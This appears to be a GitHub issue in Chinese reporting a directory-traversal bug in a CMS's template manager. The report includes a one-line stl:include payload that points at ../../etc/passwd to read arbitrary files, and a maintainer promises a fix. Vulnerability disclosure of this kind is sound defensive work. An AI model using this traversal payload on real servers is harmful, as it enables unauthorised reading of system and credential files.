cms 模版管理存在目录穿越漏洞

模版管理存在目录穿越漏洞

Open bugcandy opened this issue 1 year ago • 2 comments

在模版管理中，编辑模版或新增模版时 <stl:include file="/include/head.html"></stl:include> 代码处存在目录穿越漏洞。如修改为： <stl:include file="../../../../../../../../etc/passwd"></stl:include> 即可实现任意文件读取。

Jan 24 '24 06:01 bugcandy

PathTraversal

Jan 24 '24 06:01 bugcandy

收到，我们会尽快修复

Feb 18 '24 02:02 starlying

cms cms copied to clipboard

模版管理存在目录穿越漏洞

cms
cms copied to clipboard